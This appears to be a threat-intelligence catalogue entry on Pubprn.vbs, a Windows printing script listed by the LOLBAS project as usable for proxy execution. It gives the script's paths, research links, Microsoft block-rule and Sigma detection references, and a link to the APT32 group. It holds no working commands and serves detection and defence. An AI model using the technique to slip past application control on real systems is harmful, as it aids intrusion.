Skip to content

Hide Navigation Hide TOC

Pubprn (58883c83-d5be-42fc-b4bd-9287e55cd499)

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Proxy execution with Pubprn.vbs

Author: Oddvar Moe

Paths: * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs

Resources: * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://github.com/enigma0x3/windows-operating-system-archaeology

Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_pubprn.yml[Pubprn.vbs - LOLBAS Project]

Cluster A Galaxy A Cluster B Galaxy B Level
APT32 (c0fe9859-e8de-4ce1-bc3c-b489e914a145) Tidal Groups Pubprn (58883c83-d5be-42fc-b4bd-9287e55cd499) Tidal Software 1